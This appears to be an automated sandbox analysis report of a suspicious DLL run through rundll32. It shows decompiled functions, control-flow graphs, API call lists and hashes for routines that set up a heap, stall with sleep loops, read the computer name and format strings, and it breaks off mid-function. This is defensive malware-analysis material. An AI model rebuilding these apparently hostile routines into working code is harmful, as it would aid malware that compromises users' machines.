                                          0x047b6e4e
                                          0x047b6e4e
                                          0x047b6e54
                                          0x00000000
                                          0x047b6e54
                                          0x047b6dbe
                                          0x047b6dc3
                                          0x047b6dcc
                                          0x047b6dd1
                                          0x047b6dd5
                                          0x047b6dfc
                                          0x047b6dd7
                                          0x047b6de7
                                          0x047b6df1
                                          0x047b6df3
                                          0x047b6df3
                                          0x047b6dff
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x047b6dff
                                          0x047b6daf

                                          APIs
                                          • memset.NTDLL ref: 047B6CED
                                            • Part of subcall function 047B4814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,047B6D15,00410025,00000005,?,00000000), ref: 047B4825
                                            • Part of subcall function 047B4814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 047B4842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 047B6D24
                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,047B4AB5), ref: 047B6D2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: 3a6fdb8624939c454ebc75e598a4dae6eb2ebb11586a129d7d5601b6386cdc06
                                          • Instruction ID: ec16201ce3429c47a60f23b32fe81c47b87fcfb8bb85a5a2301c187403a8a957
                                          • Opcode Fuzzy Hash: 3a6fdb8624939c454ebc75e598a4dae6eb2ebb11586a129d7d5601b6386cdc06
                                          • Instruction Fuzzy Hash: 14415D72204355AFE710AEA4DC88FEF77E8EF44618F40892ABAC4D6210D675E90487D2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B4FFA, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 314 47b4ffa-47b503c 316 47b50c3-47b50c9 314->316 317 47b5042-47b504b 314->317 318 47b504d-47b505e SysAllocString 317->318 319 47b508c-47b508f 317->319 322 47b5069-47b5081 318->322 323 47b5060-47b5067 318->323 320 47b50ed 319->320 321 47b5091-47b50a1 SysAllocString 319->321 326 47b50ef-47b50f2 320->326 324 47b50cc-47b50eb 321->324 325 47b50a3 321->325 331 47b5085-47b508a 322->331 327 47b50b5-47b50b8 323->327 324->326 328 47b50aa-47b50ac 325->328 326->328 330 47b50f4-47b5101 326->330 327->316 329 47b50ba-47b50bd SysFreeString 327->329 328->327 332 47b50ae-47b50af SysFreeString 328->332 329->316 330->316 331->319 331->327 332->327
                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 047B5057
                                          • SysAllocString.OLEAUT32(047BA6F4), ref: 047B509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 047B50AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 047B50BD
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 2907e7360094c1f876d1c75c1680d6583631acb19eccd51119a05511c375621d
                                          • Instruction ID: 23b94598de1cfe6b735f903e6b11ddc551520acd69078ddf2eaeb3f487d6b1b8
                                          • Opcode Fuzzy Hash: 2907e7360094c1f876d1c75c1680d6583631acb19eccd51119a05511c375621d
                                          • Instruction Fuzzy Hash: D331FC7190064ABFCB15DFA8D8C4AEE7BB9EF48304B10882EF54597250E775A941CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B90A1, Relevance: 6.0, APIs: 4, Instructions: 38sleepmemorythreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 334 47b90a1-47b90b7 HeapCreate 335 47b90b9-47b90bc 334->335 336 47b90be-47b90d4 GetTickCount call 47b6a7f 334->336 337 47b911c 335->337 336->337 340 47b90d6-47b90d7 336->340 341 47b90d8-47b9100 SwitchToThread call 47b1c04 Sleep 340->341 344 47b9102-47b910b call 47b9511 341->344 347 47b910d 344->347 348 47b9117 call 47b4908 344->348 347->348 348->337
                                          C-Code - Quality: 100%
                                          			E047B90A1(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _t5;
				void* _t7;
				void* _t10;
				void* _t13;
				void* _t14;
				void* _t15;
				signed int _t16;
				signed int _t22;

				_t16 = __edx;
				_t5 = HeapCreate(0, 0x400000, 0); // executed
				 *0x47bd238 = _t5;
				if(_t5 == 0) {
					_t14 = 8;
					return _t14;
				}
				 *0x47bd1a8 = GetTickCount();
				_t7 = E047B6A7F(_a4);
				if(_t7 == 0) {
					do {
						_t22 = SwitchToThread() + 8;
						_t10 = E047B1C04(_a4, _t22);
						Sleep(0x20 + _t22 * 4); // executed
					} while (_t10 == 1);
					if(E047B9511(_t15) != 0) {
						 *0x47bd260 = 1; // executed
					}
					_t13 = E047B4908(_t16); // executed
					return _t13;
				}
				return _t7;
			}











                                          0x047b90a1
                                          0x047b90aa
                                          0x047b90b0
                                          0x047b90b7
                                          0x047b90bb
                                          0x00000000
                                          0x047b90bb
                                          0x047b90c8
                                          0x047b90cd
                                          0x047b90d4
                                          0x047b90d8
                                          0x047b90e4
                                          0x047b90e8
                                          0x047b90f7
                                          0x047b90fd
                                          0x047b910b
                                          0x047b910d
                                          0x047b910d
                                          0x047b9117
                                          0x00000000
                                          0x047b9117
                                          0x047b911c

                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,047B6F11,?), ref: 047B90AA
                                          • GetTickCount.KERNEL32 ref: 047B90BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 047B90D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 047B90F7
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID:
                                          • API String ID: 377297877-0
                                          • Opcode ID: 47696e232d59db8876cee31df2be433dc34a50f6f8707284b1587325ac203f9e
                                          • Instruction ID: 6fd5c92224a30de68c79e325025d5d13a5236dbd1260dcf669cdb150ddd56c86
                                          • Opcode Fuzzy Hash: 47696e232d59db8876cee31df2be433dc34a50f6f8707284b1587325ac203f9e
                                          • Instruction Fuzzy Hash: FBF0C2F1600615AFEB216B749D0CFDA3BA4EF44359F00C425EB94D6340EB38E80086E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B68CF, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 350 47b68cf-47b68e9 call 47b9138 353 47b68eb 350->353 354 47b68ee-47b6907 call 47b1b13 350->354 353->354 356 47b690c-47b6910 354->356 357 47b69cf-47b69d4 356->357 358 47b6916-47b6930 StrToIntExW 356->358 359 47b69db-47b69e1 357->359 360 47b69d6 call 47b568a 357->360 361 47b69bf-47b69c1 358->361 362 47b6936-47b6952 call 47b5fcb 358->362 360->359 365 47b69c2-47b69cd HeapFree 361->365 362->365 367 47b6954-47b696d call 47b75e7 362->367 365->357 370 47b698f-47b69bd call 47b1bc1 HeapFree 367->370 371 47b696f-47b6976 367->371 370->365 371->370 372 47b6978-47b698a call 47b75e7 371->372 372->370
                                          C-Code - Quality: 100%
                                          			E047B68CF() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t51;

				_v12 = 0;
				_t23 = E047B9138(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x47bd2a4; // 0x24fa5a8
				_t4 = _t24 + 0x47bede0; // 0x6cb9388
				_t5 = _t24 + 0x47bed88; // 0x4f0053
				_t26 = E047B1B13( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x47bd2a4; // 0x24fa5a8
						_t11 = _t32 + 0x47bedd4; // 0x6cb937c
						_t48 = _t11;
						_t12 = _t32 + 0x47bed88; // 0x4f0053
						_t51 = E047B5FCB(_t11, _t12, _t11);
						_t58 = _t51;
						if(_t51 != 0) {
							_t35 =  *0x47bd2a4; // 0x24fa5a8
							_t13 = _t35 + 0x47bea59; // 0x30314549
							if(E047B75E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
								_t60 =  *0x47bd25c - 6;
								if( *0x47bd25c <= 6) {
									_t42 =  *0x47bd2a4; // 0x24fa5a8
									_t15 = _t42 + 0x47bec3a; // 0x52384549
									E047B75E7(_t48, _t60, _v8, _t51, _t15, 0x13);
								}
							}
							_t38 =  *0x47bd2a4; // 0x24fa5a8
							_t17 = _t38 + 0x47bee18; // 0x6cb93c0
							_t18 = _t38 + 0x47bedf0; // 0x680043
							_t45 = E047B1BC1(_v8, 0x80000001, _t51, _t18, _t17);
							HeapFree( *0x47bd238, 0, _t51);
						}
					}
					HeapFree( *0x47bd238, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E047B568A(_t53);
				}
				return _t45;
			}

















                                          0x047b68df
                                          0x047b68e2
                                          0x047b68e9
                                          0x047b68eb
                                          0x047b68eb
                                          0x047b68ee
                                          0x047b68f3
                                          0x047b68fa
                                          0x047b6907
                                          0x047b690c
                                          0x047b6910
                                          0x047b691e
                                          0x047b692c
                                          0x047b6930
                                          0x047b69c1
                                          0x047b69c1
                                          0x047b6936
                                          0x047b6936
                                          0x047b693b
                                          0x047b693b
                                          0x047b6942
                                          0x047b694e
                                          0x047b6950
                                          0x047b6952
                                          0x047b6954
                                          0x047b695b
                                          0x047b696d
                                          0x047b696f
                                          0x047b6976
                                          0x047b6978
                                          0x047b697f
                                          0x047b698a
                                          0x047b698a
                                          0x047b6976
                                          0x047b698f
                                          0x047b6994
                                          0x047b699b
                                          0x047b69b9
                                          0x047b69bb
                                          0x047b69bb
                                          0x047b6952
                                          0x047b69cd
                                          0x047b69cd
                                          0x047b69cf
                                          0x047b69d4
                                          0x047b69d6
                                          0x047b69d6
                                          0x047b69e1

                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06CB9388,00000000,?,7519F710,00000000,7519F730), ref: 047B691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06CB93C0,?,00000000,30314549,00000014,004F0053,06CB937C), ref: 047B69BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,047B9C10), ref: 047B69CD
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: bde4191e7c786f7ff9d0d322cdf1b42028e86fe9b25d924aecbf02d85850e17c
                                          • Instruction ID: a46997420f94274694f886acbcc70a8e707ad92ecd8f16717f6472139aa81d54
                                          • Opcode Fuzzy Hash: bde4191e7c786f7ff9d0d322cdf1b42028e86fe9b25d924aecbf02d85850e17c
                                          • Instruction Fuzzy Hash: 9A318C72A00149BEEB21AB94DD88FDA7BBDEB44754F058069F644AB210D674EA04DBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B9F11, Relevance: 4.6, APIs: 3, Instructions: 77memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 376 47b9f11-47b9f39 377 47b9f3b-47b9f43 RtlAllocateHeap 376->377 378 47b9f59-47b9f61 RtlAllocateHeap 376->378 379 47b9f79-47b9f7b 377->379 380 47b9f45-47b9f52 call 47b1754 377->380 378->379 381 47b9f63-47b9f70 call 47b514f 378->381 383 47b9f7c-47b9f7e 379->383 388 47b9f57 380->388 385 47b9f75-47b9f77 381->385 386 47b9fbc 383->386 387 47b9f80-47b9fa1 call 47b7cf7 call 47b60cf 383->387 385->383 390 47b9fc2-47b9fc8 386->390 394 47b9fcb-47b9fdc 387->394 395 47b9fa3-47b9fb6 call 47b6106 HeapFree 387->395 388->385 394->390 397 47b9fde-47b9fe5 394->397 395->386 397->390
                                          C-Code - Quality: 58%
                                          			E047B9F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t19;
				void* _t25;
				void* _t31;
				void* _t37;
				void* _t41;
				intOrPtr _t43;
				void* _t44;

				_t37 = __edx;
				_t33 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t43 =  *0x47bd2a4; // 0x24fa5a8
				_push(0x800);
				_push(0);
				_push( *0x47bd238);
				_t1 = _t43 + 0x47be791; // 0x6976612e
				_t44 = _t1;
				if( *0x47bd24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t31 = 8;
						L7:
						if(_t31 != 0) {
							L10:
							 *0x47bd24c =  *0x47bd24c + 1;
							L11:
							return _t31;
						}
						_t46 = _a4;
						_t41 = _v8;
						 *_a16 = _a4;
						 *_a20 = E047B7CF7(_a4, _t41);
						_t19 = E047B60CF(_t41, _t41, _t46);
						if(_t19 != 0) {
							 *_a8 = _t41;
							 *_a12 = _t19;
							if( *0x47bd24c < 5) {
								 *0x47bd24c =  *0x47bd24c & 0x00000000;
							}
							goto L11;
						}
						_t31 = 0xbf;
						E047B6106();
						HeapFree( *0x47bd238, 0, _t41);
						goto L10;
					}
					_t25 = E047B514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
					L5:
					_t31 = _t25;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t25 = E047B1754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
				goto L5;
			}












                                          0x047b9f11
                                          0x047b9f11
                                          0x047b9f14
                                          0x047b9f15
                                          0x047b9f1f
                                          0x047b9f26
                                          0x047b9f2b
                                          0x047b9f2d
                                          0x047b9f33
                                          0x047b9f33
                                          0x047b9f39
                                          0x047b9f61
                                          0x047b9f79
                                          0x047b9f7b
                                          0x047b9f7c
                                          0x047b9f7e
                                          0x047b9fbc
                                          0x047b9fbc
                                          0x047b9fc2
                                          0x047b9fc8
                                          0x047b9fc8
                                          0x047b9f80
                                          0x047b9f86
                                          0x047b9f89
                                          0x047b9f98
                                          0x047b9f9a
                                          0x047b9fa1
                                          0x047b9fd5
                                          0x047b9fda
                                          0x047b9fdc
                                          0x047b9fde
                                          0x047b9fde
                                          0x00000000
                                          0x047b9fdc
                                          0x047b9fa3
                                          0x047b9fa8
                                          0x047b9fb6
                                          0x00000000
                                          0x047b9fb6
                                          0x047b9f70
                                          0x047b9f75
                                          0x047b9f75
                                          0x00000000
                                          0x047b9f75
                                          0x047b9f43
                                          0x00000000
                                          0x00000000
                                          0x047b9f52
                                          0x00000000

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 047B9F3B
                                            • Part of subcall function 047B1754: GetTickCount.KERNEL32 ref: 047B1768
                                            • Part of subcall function 047B1754: wsprintfA.USER32 ref: 047B17B8
                                            • Part of subcall function 047B1754: wsprintfA.USER32 ref: 047B17D5
                                            • Part of subcall function 047B1754: wsprintfA.USER32 ref: 047B1801
                                            • Part of subcall function 047B1754: HeapFree.KERNEL32(00000000,?), ref: 047B1813
                                            • Part of subcall function 047B1754: wsprintfA.USER32 ref: 047B1834
                                            • Part of subcall function 047B1754: HeapFree.KERNEL32(00000000,?), ref: 047B1844
                                            • Part of subcall function 047B1754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047B1872
                                            • Part of subcall function 047B1754: GetTickCount.KERNEL32 ref: 047B1883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 047B9F59
                                          • HeapFree.KERNEL32(00000000,?,?,?,047B9C62,00000002,?,?,?,?), ref: 047B9FB6
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: 5c0472ce3327dddcca5e84d44ecb32f1351b2346b2788cf400d3b5ba5c9d9e24
                                          • Instruction ID: 91e1c54c35b7b35ce16b596862dd333724fa1f21b3e797c4103e1046e7025d64
                                          • Opcode Fuzzy Hash: 5c0472ce3327dddcca5e84d44ecb32f1351b2346b2788cf400d3b5ba5c9d9e24
                                          • Instruction Fuzzy Hash: 9C2136B5200209AFEB119F69D844FDA37ACEF48354F10842AFB569B340EB74F9459BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B642C, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 399 47b642c-47b6452 401 47b6458-47b646c call 47b4ffa 399->401 402 47b6520-47b6526 399->402 404 47b6471-47b6475 401->404 405 47b647b-47b6480 404->405 406 47b6517-47b651c 404->406 407 47b6498-47b649a 405->407 408 47b6482-47b6485 405->408 406->402 407->406 410 47b649c-47b64c2 407->410 408->407 409 47b6487-47b6496 408->409 409->407 413 47b64f0-47b64f5 410->413 414 47b64c4-47b64d0 call 47b5103 410->414 415 47b64fd-47b6506 413->415 416 47b64f7-47b64f9 413->416 414->413 421 47b64d2-47b64d7 414->421 419 47b6508-47b650b SysFreeString 415->419 420 47b650d-47b6510 415->420 416->415 419->420 420->406 422 47b6512-47b6515 SysFreeString 420->422 421->413 423 47b64d9-47b64dc 421->423 422->406 423->413 424 47b64de-47b64ee 423->424 424->413
                                          C-Code - Quality: 75%
                                          			E047B642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E047B4FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x47bd2a4; // 0x24fa5a8
						_t20 = _t68 + 0x47be1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E047B5103(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                          0x047b6432
                                          0x047b6435
                                          0x047b6445
                                          0x047b644e
                                          0x047b6452
                                          0x047b6520
                                          0x047b6526
                                          0x047b6526
                                          0x047b646c
                                          0x047b6471
                                          0x047b6475
                                          0x047b647b
                                          0x047b6480
                                          0x047b6487
                                          0x047b6496
                                          0x047b6496
                                          0x047b649a
                                          0x047b649c
                                          0x047b64a8
                                          0x047b64b3
                                          0x047b64be
                                          0x047b64c2
                                          0x047b64cc
                                          0x047b64d0
                                          0x047b64d2
                                          0x047b64d7
                                          0x047b64de
                                          0x047b64ee
                                          0x047b64ee
                                          0x047b64d7
                                          0x047b64d0
                                          0x047b64f0
                                          0x047b64f5
                                          0x047b64fa
                                          0x047b64fa
                                          0x047b64fd
                                          0x047b6506
                                          0x047b650b
                                          0x047b650b
                                          0x047b6510
                                          0x047b6515
                                          0x047b6515
                                          0x047b6510
                                          0x047b649a
                                          0x047b6517
                                          0x047b651d
                                          0x00000000

                                          APIs
                                            • Part of subcall function 047B4FFA: SysAllocString.OLEAUT32(80000002), ref: 047B5057
                                            • Part of subcall function 047B4FFA: SysFreeString.OLEAUT32(00000000), ref: 047B50BD
                                          • SysFreeString.OLEAUT32(?), ref: 047B650B
                                          • SysFreeString.OLEAUT32(047BA6F4), ref: 047B6515
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: 7b1f589935c3220ede4f40cb070c6cc2b043498c1daea00b1535c7c8cfd5381e
                                          • Instruction ID: cf3e76378d17c7b3b5eb89a92e45a8543787fbb27088d4d6298f46ce8c06419d
                                          • Opcode Fuzzy Hash: 7b1f589935c3220ede4f40cb070c6cc2b043498c1daea00b1535c7c8cfd5381e
                                          • Instruction Fuzzy Hash: 50314872500159AFCB21DFA8C888DDBBB79FFC97447148658FA459B214E231ED51CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B73E9, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E047B73E9(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E047B58BE(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E047B147E(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                          0x047b73ee
                                          0x047b73f9
                                          0x047b73fb
                                          0x047b7401
                                          0x047b7403
                                          0x047b7408
                                          0x047b7411
                                          0x047b7415
                                          0x047b741e
                                          0x047b7422
                                          0x047b7431
                                          0x047b7424
                                          0x047b7425
                                          0x047b742a
                                          0x047b742a
                                          0x047b7422
                                          0x047b7415
                                          0x047b743a

                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,047B51DC,7519F710,00000000,?,?,047B51DC), ref: 047B7401
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,047B51DC,047B51DD,?,?,047B51DC), ref: 047B741E
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 221023657a8ec51f0070966e6340bfb6614da438143340249cb2eb4540cd2d44
                                          • Instruction ID: 821c4b61148db2c1c9bb04ab278e1c43fe3163ce40376c44467a2e1bbfa9b4da
                                          • Opcode Fuzzy Hash: 221023657a8ec51f0070966e6340bfb6614da438143340249cb2eb4540cd2d44
                                          • Instruction Fuzzy Hash: 7BF0B426600109BAE711DABA8D04FEF7BBCDBC4681F210069A944D3300EA74EF0187F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B7BA9, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 34%
                                          			E047B7BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x47bd2a4; // 0x24fa5a8
				_t4 = _t15 + 0x47be39c; // 0x6cb8944
				_t20 = _t4;
				_t6 = _t15 + 0x47be124; // 0x650047
				_t17 = E047B642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E047B4CD3(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                          0x047b7bb3
                                          0x047b7bba
                                          0x047b7bbb
                                          0x047b7bbc
                                          0x047b7bbd
                                          0x047b7bc3
                                          0x047b7bc8
                                          0x047b7bc8
                                          0x047b7bd2
                                          0x047b7be4
                                          0x047b7beb
                                          0x047b7c19
                                          0x047b7bed
                                          0x047b7bef
                                          0x047b7bf4
                                          0x047b7c16
                                          0x047b7bf6
